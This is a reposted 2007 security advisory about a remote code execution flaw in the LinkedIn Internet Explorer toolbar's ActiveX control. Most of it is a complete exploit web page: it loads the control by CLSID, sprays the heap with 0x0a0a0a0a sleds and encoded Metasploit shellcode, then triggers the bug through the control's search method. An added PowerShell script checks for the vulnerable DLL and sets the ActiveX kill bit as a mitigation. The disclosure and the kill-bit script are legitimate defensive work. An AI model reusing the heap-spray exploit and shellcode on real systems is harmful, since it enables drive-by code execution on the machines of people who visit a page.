Tuesday, July 24, 2007

[EXPL] LinkedIn Toolbar (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

LinkedIn Toolbar (Exploit)
------------------------------------------------------------------------


SUMMARY

<http://www.linkedin.com/> LinkedIn is "a business oriented social
networking site, mainly used for professional networking". A vulnerability
in the LinkedIn toolbar allows remote code execution on the client side.

DETAILS

Vulnerable Systems:
* LinkedInIEToolbar.dll version: 3.0.2.1098 (Tested on Windows XP SP2)

If a user running the LinkedIn toolbar is tricked into visiting a website
containing this exploit, the calc.exe application will be launched.

Online PoC:
http://www.vdalabs.com/tools/IE7_LinkedIn_PoC.html

Exploit:
<HTML>
<TITLE>In God We Trust, VDA Labs, LLC</TITLE>
<HEAD>
<object classid='clsid:0F2437D6-C4E4-42CA-A906-F506E09354B7'
id='target'></object>
<script language='javascript'>

function repeat(n,c)
{
retval="";
for (i=0;i<n;i++)
retval = retval + c;
return retval
}

//EAX contains this value. call [eax]. that lands us on the nops.
blind_jmp = repeat(50000,unescape("%u0a0a%u0a0a"));

//shellcode: From metasploit.com. SC can be very big if you want.
shellcode =
unescape("%uc931%ue983%ud9dd%ud9ee%u2474%u5bf4%u7381%ub213%u28cd%u837b%ufceb%uf4e2%u254e%u7b6c%ucdb2%u3ea3%u468e%u7e54%uccca%uf0c7%ud5fd%u24a3%ucc92%u32c3%uf939%u7aa3%ufc5c%ue2e8%u491e%u0fe8%u0cb5%u76e2%u0fb3%u8fc3%u9989%u7f0c%u28c7%u24a3%ucc96%u1dc3%uc139%uf063%ud1ed%u9029%ud139%u7aa3%u4459%u5f74%u0eb6%ubb19%u46d6%u4b68%u0d37%u7750%u8d39%uf024%ud1c2%uf085%uc5da%u72c3%u4d39%u7b98%ucdb2%u13a3%u928e%u8d19%u9bd2%u83a1%u0d31%u2b53%ub3da%u99f0%ua5c1%u85b0%uc338%u847f%uae55%u1749%ue3d1%u034d%ucdd7%u7b28");

//changed to point to 0x0a0a0a0a
nops = repeat(3925, unescape("%u0a0a%u0a0a") ); //jmp +0, push eax, pop eax

mem = new Array();
for(i=0; i<9000; i++)
{
mem[i] = nops+shellcode;
}

//make string
target.search("jared", blind_jmp);

</script>
</body>
</html>
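The control is instantiated through the CLSID in the <object> tag above, so the standard mitigation for an exploitable ActiveX control applies: set its "kill bit" (Compatibility Flags 0x400) so Internet Explorer refuses to create it from a web page. The script below is an added example, not part of the VDA Labs advisory; it assumes an elevated PowerShell session, that the control's InprocServer32 registration points at LinkedInIEToolbar.dll, and that the four-part file version is comparable with the 3.0.2.1098 the advisory lists.

```powershell
# Added example (not from the advisory): audit for the vulnerable LinkedIn toolbar
# control and set the ActiveX kill bit so IE will not instantiate it. Run elevated.
$Clsid   = '{0F2437D6-C4E4-42CA-A906-F506E09354B7}'   # CLSID from the advisory's <object> tag
$VulnVer = New-Object System.Version(3, 0, 2, 1098)   # version the advisory reports as vulnerable
$KillBit = 0x400                                      # Compatibility Flags bit that blocks the control

# 1. Locate the registered server DLL through the class registration and check its version.
$reg = Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid\InprocServer32" -ErrorAction SilentlyContinue
if ($reg -and $reg.'(default)') {
    $dll = $reg.'(default)'.Trim('"')
    $vi  = (Get-Item $dll).VersionInfo
    $ver = New-Object System.Version($vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart)
    if ($ver -le $VulnVer) { Write-Output "Vulnerable control found: $dll ($ver)" }
    else                   { Write-Output "Control present but newer than the advisory's version: $ver" }
} else {
    Write-Output "Control $Clsid is not registered on this host"
}

# 2. Set the kill bit regardless (defense in depth). On 64-bit Windows the WOW6432Node
#    view is covered as well so 32-bit IE is protected too (assumption: both views are used).
$paths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
if ([Environment]::Is64BitOperatingSystem) {
    $paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}
foreach ($p in $paths) {
    if (-not (Test-Path $p)) { New-Item -Path $p -Force | Out-Null }
    $cur = (Get-ItemProperty -Path $p -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    Set-ItemProperty -Path $p -Name 'Compatibility Flags' -Value ([int]$cur -bor $KillBit) -Type DWord
    # Read back and report so the change is verifiable in the run log.
    $after = (Get-ItemProperty -Path $p -Name 'Compatibility Flags').'Compatibility Flags'
    $state = if ($after -band $KillBit) { 'set' } else { 'NOT set' }
    Write-Output ("{0}: Compatibility Flags = 0x{1:X8} (kill bit {2})" -f $p, $after, $state)
}
```

The kill bit only stops IE from loading the control from web content; it does not remove the toolbar, so updating or uninstalling the toolbar remains the complete fix.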


ADDITIONAL INFORMATION

The information has been provided by VDA Labs.
The original article can be found at:
<http://www.vdalabs.com/tools/linkedin.html>
